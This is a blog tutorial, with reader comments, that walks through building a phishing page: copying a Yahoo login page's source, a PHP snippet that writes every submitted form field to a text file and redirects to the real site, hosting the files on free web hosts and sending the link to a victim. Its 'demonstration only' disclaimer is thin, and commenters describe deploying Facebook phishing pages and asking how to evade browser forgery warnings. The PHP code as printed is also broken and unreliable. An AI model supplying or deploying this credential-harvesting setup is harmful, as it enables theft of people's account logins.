How Phisher Works? – how hacker creates fake login page?

Disclaimer! : This tutorial is just for demonstration purpose and to make you conscious about the risk. We do not encourage you in any manner to try it on Others.

Phishing is a type of deception designed to steal your valuable personal data such as login details, credit card numbers, account data, or other information. below we have put-up basic phisher mechanism that a hacker uses to make fake login pages.

how to create fake facebook login page

If you know HTML & PhP, you will find it very easy. lets See how simple it is to construct and set up a fake login page and steal the password.

Phisher Demonstration

Here’s what you will need:

1) A web hosting account or LocalHost

There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. For this reason its better to rey this on LocalHost. Just google “How to host website on local host”, you will get tons of tutorials.

2) A fake login page

To create a fake login page, just visit the desired login page. lets say yahoo’s login page. now Right Click on that page and click on ‘view source’ or view ‘page source’. after this a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- yahoo.html

3) A php code that writes data on to a text file

Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php

header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);

4) A text file to save hacked password

Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file

Creating phisher

Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.
ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt

Linking yahoo.html and code.php
Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field you will see something like this:

Replace everything in red with code.php, and save the file.

You just connected yahoo.html to code.php
[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php

Linking code.php and passwords.txt
In the above given code, passwords.txt is already connected with code.php.
Now just open code.php with text editor and  in the 2nd line replace “original login page” with the desired original login page of your phisher.
In our eg it is and save it.
You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.
Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.

Hosting Phisher

#step1 login to your newly created free hosting account
#step2 click on ‘file manager’ to open file manager
#step3 now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
#step4 Now just create a new directory(folder) and name it according to phisher you have created.
#step5 navigate to the desired directory that you just created in ‘step3′
#step6 Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
note- all the 3 files must be in the same directory.
#step7 copy the addresses of .html and .txt files
#step8 Now Send this phisher to your Virtual-victim. just send the link (.html file’s address) via email or any other medium.
#step9 Now ask your virtual-victim to log-in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.

That’s it! you are done. enjoy!

Article by Ashwin Shahapurkar

[Founder] - Quiet type and Creative Guy who enjoys creating and exploring new trends on the Internet. He's currently pursuing B.E. in “Information Technology”. Send an email
Windows phone 8 – New features and Handsets! How to Block Unwanted SMS on Android phone? Candice Boucher wallpapers for Samsung Galaxy Mobiles Mobile Spy App for android, iphone, Blackberry & Nokia
Subscribe to Comments RSS Feed in this post

178 Responses

  1. I got error with code.php i.e

    Parse error: syntax error, unexpected ‘:’ in /home/a5647992/public_html/code.php on line 2

    Help me please !

  2. Doteasy is not a free webhosting …!
    it requires money yaar….!

  3. Icant do tis ….!
    i need a help frdzzzzzzzzzzzzzzz………..!

  4. i made a fb phishing page but whenever anyone opens it. browser simply shows that it is a web forgery and can harm u. plz help me it creats a lot of problem